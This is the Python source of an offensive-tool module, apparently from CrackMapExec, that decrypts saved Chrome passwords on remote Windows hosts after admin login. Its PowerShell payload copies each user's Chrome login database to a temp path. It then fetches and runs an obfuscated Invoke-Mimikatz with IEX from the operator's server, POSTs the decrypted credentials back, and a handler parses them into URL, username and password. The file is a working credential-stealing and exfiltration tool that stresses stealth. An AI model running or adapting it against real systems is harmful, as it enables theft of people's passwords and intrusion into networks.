122 lines
5.0 KiB
Python
122 lines
5.0 KiB
Python
from cme.helpers.powershell import *
|
|
from cme.helpers.logger import write_log
|
|
from datetime import datetime
|
|
from io import StringIO
|
|
|
|
class CMEModule:
|
|
'''
|
|
Executes PowerSploit's Invoke-Mimikatz.ps1 script (Mimikatz's DPAPI Module) to decrypt saved Chrome passwords
|
|
Pros and cons vs the standard enum_chrome module:
|
|
+ Opsec safe, doesn't touch disk
|
|
- Tends to error out and/or not decrypt all stored credentials (not sure why exactly, should work perfectly in theory)
|
|
|
|
Module by @byt3bl33d3r
|
|
'''
|
|
|
|
name = 'mimikatz_enum_chrome'
|
|
description = "Decrypts saved Chrome passwords using Mimikatz"
|
|
opsec_safe = True
|
|
multiple_hosts = True
|
|
supported_protocols = ['smb', 'mssql']
|
|
|
|
def options(self, context, module_options):
|
|
'''
|
|
'''
|
|
|
|
self.ps_script = obfs_ps_script('powersploit/Exfiltration/Invoke-Mimikatz.ps1')
|
|
|
|
def on_admin_login(self, context, connection):
|
|
|
|
'''
|
|
Oook.. Think my heads going to explode
|
|
|
|
So Mimikatz's DPAPI module requires the path to Chrome's database in double quotes otherwise it can't interpret paths with spaces.
|
|
Problem is Invoke-Mimikatz interpretes double qoutes as seperators for the arguments to pass to the injected mimikatz binary.
|
|
|
|
As far as I can figure out there is no way around this, hence we have to first copy Chrome's database to a path without any spaces and then decrypt
|
|
the entries with Mimikatz, not ideal but it works.
|
|
'''
|
|
|
|
payload = r'''
|
|
$cmd = "privilege::debug sekurlsa::dpapi"
|
|
$userdirs = get-childitem "$Env:SystemDrive\Users"
|
|
foreach ($dir in $userdirs) {{
|
|
$LoginDataPath = "$Env:SystemDrive\Users\$dir\AppData\Local\Google\Chrome\User Data\Default\Login Data"
|
|
|
|
if ([System.IO.File]::Exists($LoginDataPath)) {{
|
|
$rand_name = -join ((65..90) + (97..122) | Get-Random -Count 7 | % {{[char]$_}})
|
|
$temp_path = "$Env:windir\Temp\$rand_name"
|
|
Copy-Item $LoginDataPath $temp_path
|
|
$cmd = $cmd + " `"dpapi::chrome /in:$temp_path`""
|
|
}}
|
|
|
|
}}
|
|
$cmd = $cmd + " exit"
|
|
|
|
IEX (New-Object Net.WebClient).DownloadString('{server}://{addr}:{port}/Invoke-Mimikatz.ps1');
|
|
$creds = Invoke-Mimikatz -Command $cmd;
|
|
$request = [System.Net.WebRequest]::Create('{server}://{addr}:{port}/');
|
|
$request.Method = 'POST';
|
|
$request.ContentType = 'application/x-www-form-urlencoded';
|
|
$bytes = [System.Text.Encoding]::ASCII.GetBytes($creds);
|
|
$request.ContentLength = $bytes.Length;
|
|
$requestStream = $request.GetRequestStream();
|
|
$requestStream.Write( $bytes, 0, $bytes.Length );
|
|
$requestStream.Close();
|
|
$request.GetResponse();'''.format(server=context.server,
|
|
port=context.server_port,
|
|
addr=context.localip)
|
|
|
|
connection.ps_execute(payload)
|
|
context.log.success('Executed payload')
|
|
|
|
def on_request(self, context, request):
|
|
if 'Invoke-Mimikatz.ps1' == request.path[1:]:
|
|
request.send_response(200)
|
|
request.end_headers()
|
|
|
|
request.wfile.write(self.ps_script.encode())
|
|
|
|
else:
|
|
request.send_response(404)
|
|
request.end_headers()
|
|
|
|
def on_response(self, context, response):
|
|
response.send_response(200)
|
|
response.end_headers()
|
|
length = int(response.headers.get('content-length'))
|
|
data = response.rfile.read(length).decode()
|
|
|
|
#We've received the response, stop tracking this host
|
|
response.stop_tracking_host()
|
|
|
|
if len(data):
|
|
buf = StringIO(data).readlines()
|
|
creds = []
|
|
|
|
try:
|
|
i = 0
|
|
while i < len(buf):
|
|
if ('URL' in buf[i]):
|
|
url = buf[i].split(':', 1)[1].strip()
|
|
user = buf[i+1].split(':', 1)[1].strip()
|
|
passw = buf[i+3].split(':', 1)[1].strip()
|
|
|
|
creds.append({'url': url, 'user': user, 'passw': passw})
|
|
|
|
i += 1
|
|
except:
|
|
context.log.error('Error parsing Mimikatz output, please check log file manually for possible credentials')
|
|
|
|
if creds:
|
|
context.log.success('Found saved Chrome credentials:')
|
|
for cred in creds:
|
|
if cred['user'] and cred['passw']:
|
|
context.log.highlight('URL: ' + cred['url'])
|
|
context.log.highlight('Username: ' + cred['user'])
|
|
context.log.highlight('Password: ' + cred['passw'])
|
|
context.log.highlight('')
|
|
|
|
log_name = 'EnumChrome-{}-{}.log'.format(response.client_address[0], datetime.now().strftime("%Y-%m-%d_%H%M%S"))
|
|
write_log(data, log_name)
|
|
context.log.info("Saved Mimikatz's output to {}".format(log_name)) |